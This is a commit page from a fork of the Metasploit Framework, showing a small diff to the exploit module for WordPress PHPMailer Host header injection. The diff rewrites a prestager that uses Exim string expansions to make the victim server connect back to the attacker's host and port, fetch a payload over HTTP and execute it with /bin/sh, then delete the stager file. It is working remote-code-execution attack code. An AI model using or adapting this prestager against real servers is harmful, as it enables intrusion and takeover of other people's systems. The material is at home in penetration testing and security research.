dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Refactor prestager to work with newer Exim 

Apparently it doesn't like reduce with extract.
This commit is contained in:
William Vu 2017-05-16 14:22:43 -05:00
parent 7c2fb9acc1
commit 7c1dea2f02
1 changed files with 3 additions and 3 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

6
modules/exploits/unix/webapp/wp_phpmailer_host_header.rb
View File

@ -111,9 +111,9 @@ class MetasploitModule < Msf::Exploit::Remote
# This is basically sh -c `wget` implemented using Exim string expansions
# Badchars we can't encode away: \ for \n (newline) and : outside strings
prestager << "/bin/sh -c ${reduce{get #{get_resource} http/1.0}" \
'{${run{/bin/echo}}}{${extract{-1}{$value}{${readsocket' \
"{inet:#{srvhost_addr}:#{srvport}}{$item$value$value}}}}}}"
prestager << '/bin/sh -c ${run{/bin/echo}{${extract{-1}{$value}' \
"{${readsocket{inet:#{srvhost_addr}:#{srvport}}" \
"{get #{get_resource} http/1.0$value$value}}}}}}"
# CmdStager should rm the file, but it blocks on the payload, so we do it
prestager << "/bin/rm -f #{cmdstager_path}"